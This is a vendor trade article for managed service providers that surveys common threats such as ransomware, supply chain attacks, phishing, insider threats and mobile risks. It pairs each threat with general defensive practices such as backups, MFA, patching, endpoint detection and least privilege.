A Managed Service Provider's Guide To The Cybersecurity Threat Landscape

By Bryson Medlock, ConnectWise

Navigating the realm of typical cyber threats is growing more difficult and time-consuming, especially in the era of remote work. IT administrators must allow system access to several remote terminals throughout the nation, or even around the world, for businesses to stay productive. According to a Gartner report, cloud services will manage 70 percent of staff work by 2023—nearly double what was reported in 2020. With this major shift in the way people work, it’s no surprise that over 85 percent of firms suffered a successful cyberattack in the last year alone.

Experts are pushing for cloud infrastructure and remote work, making human error one of the most serious cybersecurity threats this year. It is expected that 99 percent of data breaches would be triggered by end user misconfiguration of settings or installation, suggesting that most prevalent threats in the future are preventable. It will require some contemplation and learning from the past to prevent them.

Learning From The Past

Data from the previous year provided some intriguing hints as to what patterns could develop in the future of the digital landscape. One of them is that the internet is more responsible than ever before for cybercrime. In fact, 43 percent of cyberattacks in 2021 alone came from internet-facing devices. Compared to 2020, credential-based attacks were more popular with the shift to remote work. With the future of work adopting a hybrid/remote approach, which requires increased connectivity to one another, Managed Service Providers (MSPs) should be making protection against attacks a top priority moving forward.

Protecting our always-connected devices and monitoring dangerous mobile attacks are just the beginning. MSPs and other IT workers should be mindful of a variety of hacker tactics, techniques, and procedures (TTPs) that will remain prominent in 2022. Here are several frequent cyber threats to keep a lookout for:

Ransomware

According to ConnectWise’s 2022 MSP Threat Report, 40 percent of cybersecurity incidents were related to ransomware. While the delivery methods have evolved and gotten more creative, the principle has stayed the same and still poses a major threat to every organization.

With ransomware wreaking havoc on businesses all around the world, the question becomes, "How can you guard against it?" These powerful attacks must be dealt with on two fronts. First, MSPs should focus not just on internal procedures to secure client systems but also on limiting the harm end users might create. Modern EDR (Endpoint Detection and Response) software can help prevent ransomware payloads from executing. They may also define security criteria for endpoint web browsing to guarantee that clients’ employees do not leave secure browsing areas. Second, having a reliable and thorough backup strategy might be one of your finest anti-ransomware protections. If a client's system is larger, it is impossible to block all attacks. The key is to have systems in place to back up corrupted data from attacks that do succeed.

Supply Chain Attacks

Tripling in quantity last year, these types of attacks have been around for a while but have grown in both size and frequency in recent years. Hackers use this form of infiltration to gain access to the source code, build code, and other infrastructure components of innocuous software applications. The ultimate objective is to use these reputable sites as conduits for virus distribution into supply chain systems.

One of the most frustrating challenges MSPs face is preventing future supply chain attacks. With the growing reliance on open-source systems and APIs, hackers will have no shortage of entry points through which to carry out their harmful activities. However, there is hope. MSPs may safeguard their clients against supply chain attacks by taking the following steps:

• Use endpoint monitoring technologies to detect and halt suspicious activities.
• Maintain current system patches and updates (and don’t forget about IoT devices).
• Implement integrity controls to guarantee that users only run tools from trusted sources.
• Require admins and other users to implement multi-factor authentication.

Working with your customers to create an effective incident response strategy, in addition to the actions listed above, will go a long way toward securing their digital assets.

Cloud-Based Threats

Cloud-based risks include a diverse set of hacking tactics. With so many organizations relying on the cloud and cloud networks becoming more complex, their infrastructure has become "low-hanging fruit" for cybercriminals.

Focusing on airtight standard cybersecurity procedures is an essential action MSPs can take to secure their clients, given that cloud-based apps carry the majority of the current business load. Monitoring access to important resources, enforcing stringent password restrictions, having a solid data backup plan, enabling MFA everywhere, and employing data encryption is essential for safeguarding customers from a wide range of cloud-based attacks.

To offer an additional layer of protection, MSPs should also conduct routine penetration testing. One of the best ways to increase your clients' defenses is to think like a cybercriminal and test their cybersecurity measures to the breaking point. After testing, be careful to identify and catalog any system flaws.

Social Engineering

Social engineering attacks are defined as any hacking approach that exploits a user's human nature or emotion, such as phishing. Because user mistakes and the human element will always be a component of the cybersecurity jigsaw, these attacks can provide a problem for MSPs. They currently account for 98 percent of all cybersecurity attacks. There are also 75 times more phishing websites than malware sites, making it a major point of worry for MSPs. Because social engineering attacks rely primarily on end user behavior, education is the strongest method of defense, but a proper spam filter also can assist with that in the meantime.

Insider Threats

Insider threats, like social engineering, rely on the carelessness and behaviors of a company's end customers. MSPs should collaborate closely with their customers to create a plan for cybersecurity education and behavior monitoring that reduces the likelihood of an insider threat arising.

The best defense against insider threats is to follow the principle of least privilege wherever possible. Users and technicians alike should only have access to the systems and data they need to do their job at the time they need it. MSPs should also deploy tools and methods to proactively monitor their clients' networks, such as a Security Information and Event Management (SIEM) platform, in addition to performing cybersecurity awareness training. They should also develop stringent security measures and set up parameters and tools to monitor user activity.

Mobile Devices

Because people are often working from home and accessing important corporate platforms and data from various dispersed endpoints, hackers have far more infiltration options than ever before. The remote work migration has exposed 97 percent of enterprises to mobile cybersecurity threats. And, while industry analysts claim that the frequency of attacks has reduced, digital threat actors are adopting more sophisticated infiltration tactics. Hackers are becoming more inventive in their emails, chats, and social media strategies to deceive mobile users into installing harmful software and passing over sensitive information. Threat actors will even exploit the Apple App Store or Google Play App Store to infiltrate customers' mobile devices. Some practical actions include:

• Requiring users to use safe, complicated passwords
• Maintaining OS upgrades and system patches
• Ensuring that clients encrypt their data
• Requesting clients to install antivirus or anti-malware protection

Poor Incident Response

MSPs should have a detailed plan in place for what to do in the aftermath of an attack. You can ensure consistent analytics and reporting outcomes by using the same approach each time you analyze the most recent cyber threat occurrence. This procedure is sometimes referred to as an incident response plan, and it is critical for decreasing risk/damage and making businesses safer in the future. This plan should include neutralizing and assessing the attack, creating a plan of notification, and considering a response service to assist with tackling issues if your team is understaffed or stalled.

Conclusion

Educating yourself on common cyberthreats is a great way to be prepared on your client’s behalf, but don’t forget that those best practices apply to you too. By staying secure, you are offering both your organization and your clients peace of mind.

About The Author

Bryson Medlock is a Threat researcher at ConnectWise's Cyber Research Unit.